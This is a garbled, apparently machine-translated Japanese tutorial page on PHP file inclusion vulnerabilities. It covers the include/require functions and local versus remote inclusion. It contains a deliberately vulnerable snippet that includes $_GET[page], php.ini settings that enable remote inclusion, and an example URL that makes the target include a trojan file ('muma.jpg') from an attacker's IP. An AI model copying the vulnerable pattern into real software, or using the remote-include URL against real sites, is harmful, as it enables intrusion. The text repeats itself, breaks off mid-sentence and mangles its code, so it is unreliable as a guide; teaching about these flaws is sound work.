ファイルには脆弱性が含まれています.概要と分類のデモ
2125 ワード
ファイルには、脆弱性の概要と分類のデモが含まれています.
脆弱性を含む概要
目次ファイルには、脆弱性の概要と分類デモ が含まれています.脆弱性プロファイル を含む脆弱性の原因 PHPの4つのファイル関数 を含む PHPは脆弱性分類 を含むローカルLIF を含むリモートは を含む.
操作を含めて、ほとんどのWeb言語で提供される機能ですが、PHPはファイルを含む機能に対して強すぎて、柔軟性があるので、PHP言語に含まれる脆弱性がよく現れます.これは間違いの現状を招いています.多くの初心者は、含まれる穴がPHP言語の中にしか現れないと思っていますが、他の言語で含まれる可能性があることを知りません.これも古い言葉に応えた:機能が強ければ強いほど、脆弱性が多くなる.
脆弱性の原因
PHPに含まれる4つのファイル関数
PHPは脆弱性分類を含む
ローカルにLIFを含む
リモートインクルード
すなわち,関数後のパラメータを攻撃者が指定したwebサイトディレクトリの下のファイルに変更しても,攻撃者自身のサイトとは限らず,どのサイトでも直接入力できる.http://192.168.1.55:8080/include/main.php?page=攻撃者IP/include/muma.jpg
脆弱性を含む概要
目次
操作を含めて、ほとんどのWeb言語で提供される機能ですが、PHPはファイルを含む機能に対して強すぎて、柔軟性があるので、PHP言語に含まれる脆弱性がよく現れます.これは間違いの現状を招いています.多くの初心者は、含まれる穴がPHP言語の中にしか現れないと思っていますが、他の言語で含まれる可能性があることを知りません.これも古い言葉に応えた:機能が強ければ強いほど、脆弱性が多くなる.
脆弱性の原因
,
PHPに含まれる4つのファイル関数
include()
include_once()
require()
require_once()
,
php
PHPは脆弱性分類を含む
ローカルにLIFを含む
main.php
p
include''$_GET[page]'';
?>
1.html
1
http://192.168.1.55:8080/include/main.php?page=1.html
1.html
php.ini allow_url_include=on magic_quotes_gpc=off
リモートインクルード
すなわち,関数後のパラメータを攻撃者が指定したwebサイトディレクトリの下のファイルに変更しても,攻撃者自身のサイトとは限らず,どのサイトでも直接入力できる.http://192.168.1.55:8080/include/main.php?page=攻撃者IP/include/muma.jpg